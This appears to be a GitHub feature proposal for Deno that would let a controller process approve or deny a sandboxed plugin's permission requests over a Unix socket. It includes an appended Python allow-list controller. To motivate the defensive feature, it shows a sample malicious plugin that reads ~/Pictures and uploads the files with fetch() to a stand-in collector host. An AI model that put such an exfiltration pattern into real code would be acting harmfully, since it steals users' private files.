Proposal: (Externally) Managed Permissions #29834

@CyanChanges

Goal

Allow users to safely isolate code in a separate Deno process,
and programmatically approve or deny permissions and permission requests.

Intro

When dealing with external plugins, you may want to restrict their access.
With permission flags, the permissions are fixed up front, but you might want to decide at runtime.
Currently, the only way you could do this is through the console,
which is user-friendly, but not friendly for developers.

So adding a way to control permissions programmatically is important.

Demonstration

The user installed a random plugin from the Internet.
Obviously you shouldn't give all permissions to a random plugin from the Internet,
and you also don't know exactly which permissions the plugin requires.

So, instead of giving away all permissions, or handling stdio and parsing strings,
we can have a controller process listen on a specific Unix socket.

const listener = Deno.listen({ path: "/tmp/4567-user-plugin-permission.sock", transport: "unix" })

Then the controller process spawns a new Deno process that runs the plugin, with the --permission-controller flag:

deno --permission-controller=/tmp/4567-user-plugin-permission.sock --allow-import run user_plugin_loader.ts plugins/4567-malicious-calculator-plugin.ts

Turns out the plugin is malicious.
It is trying to upload the user's pictures.

export async function apply(ctx) {
  // ...
  for (const entry of Deno.readDirSync("~/Pictures")) { 
    // oh no, it's trying to upload all pictures from the user
    await fetch("https://malicious-information-collector/upload", {
      ...
    })
  }
  // ...
}

The malicious plugin requests read access to ~/Pictures.
Instead of prompting in console,
Deno sends a request to the socket specified in --permission-controller with all the information,
asking the external controller if it is allowed or not.

Then the controller process could prompt the user,
for example by showing a popup to the user in the WebUI,
asking if the user wants to allow it.

The user rejects it, since it doesn't make any sense for a calculator plugin to access their photos.
So the controller process could tell the Deno process to deny it, or simply kill it.

Uncaught NotCapable: Requires read access to "/home/cyan/Pictures", denied by external controller

So, our "virtual" framework successfully prevents the malicious plugin from reading the user's pictures, enforcing security.
I thought it would have many use cases.
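The exchange described above, as an added example that is not part of this proposal or of Deno itself: a controller process listens on a Unix socket, a stand-in for the sandboxed Deno process sends permission requests, and the controller answers each one from an explicit allow-list. The proposal leaves the wire format as a TODO, so the newline-delimited JSON messages, the request fields (`id`, `name`, `path`, `host`) and the `CALCULATOR_POLICY` allow-list are all assumptions made here; the default is deny, and read paths are normalized before matching so that a `..` segment cannot escape an allowed directory.

```python
"""Added example: a permission controller for the proposed --permission-controller socket."""
import json
import os
import posixpath
import socket
import tempfile
import threading
from pathlib import PurePosixPath

# Constructed allow-list for a calculator plugin. Anything not listed is denied.
CALCULATOR_POLICY = {
    "read": ["/home/cyan/plugins/calculator"],  # directories the plugin may read
    "net": ["calculator-api.example"],          # hosts the plugin may contact
}


def _under(path: str, root: str) -> bool:
    """True if `path` is `root` or lies inside it. Pure path logic, no filesystem access.
    normpath collapses '..' so '/allowed/../Pictures' is compared as '/Pictures'."""
    p, r = PurePosixPath(posixpath.normpath(path)), PurePosixPath(root)
    return p == r or r in p.parents


def decide(request: dict, policy: dict = CALCULATOR_POLICY) -> dict:
    """Decide one permission request (assumed format: {"id", "name", "path"|"host"})."""
    name = request.get("name")
    if name == "read":
        allow = any(_under(request.get("path", ""), root) for root in policy.get("read", []))
    elif name == "net":
        allow = request.get("host") in policy.get("net", [])
    else:
        allow = False  # unknown or unlisted permission kinds are denied
    return {"id": request.get("id"), "allow": allow,
            "reason": "allowed by policy" if allow else "denied by external controller"}


def serve(sock_path: str, policy: dict, ready: threading.Event) -> list:
    """Controller side: accept one Deno process and answer its requests until it
    disconnects. Returns an audit log of (request, decision) pairs."""
    audit = []
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as srv:
        srv.bind(sock_path)
        srv.listen(1)
        ready.set()
        conn, _ = srv.accept()
        with conn, conn.makefile("rb") as reader:
            for line in reader:  # one JSON request per line
                req = json.loads(line)
                resp = decide(req, policy)
                audit.append((req, resp))
                conn.sendall(json.dumps(resp).encode() + b"\n")
    return audit


def request_permissions(sock_path: str, requests: list) -> list:
    """Stand-in for the sandboxed Deno process: send each request and wait for its decision."""
    decisions = []
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as cli:
        cli.connect(sock_path)
        with cli.makefile("rb") as reader:
            for req in requests:
                cli.sendall(json.dumps(req).encode() + b"\n")
                decisions.append(json.loads(reader.readline()))
    return decisions


def run_demo() -> list:
    """Run controller and fake plugin process end to end over a temporary socket."""
    sock_dir = tempfile.mkdtemp()
    sock_path = os.path.join(sock_dir, "perm.sock")
    ready = threading.Event()
    server = threading.Thread(target=serve, args=(sock_path, CALCULATOR_POLICY, ready))
    server.start()
    ready.wait(5)
    requests = [  # constructed requests mirroring the scenario in the proposal
        {"id": 1, "name": "read", "path": "/home/cyan/plugins/calculator/config.json"},
        {"id": 2, "name": "read", "path": "/home/cyan/Pictures"},
        {"id": 3, "name": "net", "host": "malicious-information-collector"},
    ]
    try:
        return request_permissions(sock_path, requests)
    finally:
        server.join(5)
        os.unlink(sock_path)
        os.rmdir(sock_dir)


if __name__ == "__main__":
    for d in run_demo():
        print(d)
```

Running the block prints one decision per request: the plugin's own config file is allowed, the read of /home/cyan/Pictures and the upload host are both denied with the reason the Deno process would surface in its NotCapable error. A real controller would also persist the audit log returned by `serve`, since a list of what a plugin asked for is useful evidence when deciding whether to keep it installed.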

Interfaces

Todo
